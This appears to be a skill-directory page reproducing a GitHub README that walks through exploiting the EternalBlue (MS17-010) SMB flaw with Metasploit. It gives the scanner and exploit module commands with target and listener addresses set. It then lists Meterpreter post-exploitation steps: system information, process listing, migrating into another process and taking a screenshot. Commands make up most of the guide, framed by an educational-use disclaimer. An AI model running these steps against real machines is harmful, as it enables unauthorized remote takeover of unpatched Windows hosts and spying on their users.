SkillAgentSearch skills...

Exploitation

The Metasploit Exploitation - EternalBlue SMB Exploit module within the Metasploit framework enables security professionals and researchers to test the vulnerability and assess its impact on target systems. This module can also be used to develop custom payloads and exploit techniques for further research and analysis.

Install / Use

/learn @AnamolZ/Exploitation
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Metasploit Exploitation - EternalBlue SMB Exploit

This documentation provides a step-by-step guide on how to use Metasploit to exploit the EternalBlue vulnerability in a target system for educational and ethical purposes only.

Prerequisites

Before proceeding, ensure that you have the following prerequisites:

  • A Kali Linux machine with Metasploit Framework installed.
  • Permission to test on a network and system you own or have explicit permission to access.

Usage

EternalBlue Module

msf6 > search eternal

SMB MS17-010 Scanner

msf6 > use auxiliary/scanner/smb/smb_ms17_010

Target Host

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100

EternalBlue Exploit Module

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

Target Host and Local Host

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.69

Exploit the Vulnerability

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Post-Exploitation with Meterpreter - System Information

After successfully exploiting a target system using Metasploit's Meterpreter, it's essential to gather system information to better understand the compromised host. The sysinfo command is a useful tool for retrieving key information about the target system.

Using the sysinfo Command

To retrieve system information, follow these steps:

  1. Access a Meterpreter session on the compromised host. You should already have an active Meterpreter session. If not, establish one by using the appropriate Metasploit exploit.

  2. Once you have an active Meterpreter session, you can execute the sysinfo command:

meterpreter > sysinfo
meterpreter > ps
meterpreter > migrate 4536
meterpreter > screenshot

Disclaimer

This documentation and the provided commands are intended for educational and ethical purposes only. Unauthorized use of these techniques may be illegal. Ensure you have the appropriate permissions and follow ethical standards when using these tools.

Authors

License

This project is licensed under the MIT License. MIT

Related Skills

View on GitHub
GitHub Stars10
CategoryEducation
Updated1mo ago
Forks1

Security Score

75/100

Audited on Feb 6, 2026

No findings